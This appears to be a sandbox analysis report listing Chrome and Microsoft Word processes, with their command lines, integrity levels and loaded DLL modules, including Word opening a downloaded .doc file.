c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2444
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=8600993733172495800 --mojo-platform-channel-handle=4056 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3448
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=7381434046437344903 --mojo-platform-channel-handle=4004 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3544
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=8326181303611943616 --mojo-platform-channel-handle=4076 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3528
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=2837512259927886074 --mojo-platform-channel-handle=4344 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3368
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --service-request-channel-token=3016343006454849670 --mojo-platform-channel-handle=2800 --ignored=" --type=renderer " /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2764
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16463342868864615434 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3124
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16281912105966848278 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2220
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=242122210853972134 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
3036
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=996,6367090567051380352,3442713414812205062,131072 --enable-features=PasswordImport --disable-gpu-compositing --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=16073925275690007295 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
75.0.3770.100
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\75.0.3770.100\chrome_child.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dbghelp.dll
c:\windows\system32\comdlg32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll

PID
2780
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\LLC_3967441212124_V.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\windows\system32\userenv.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\actxprxy.dll
c:\progra~1\common~1\micros~1\office14\ophproxy.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20enu.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\netutils.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\windowscodecs.dll

PID
2504
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
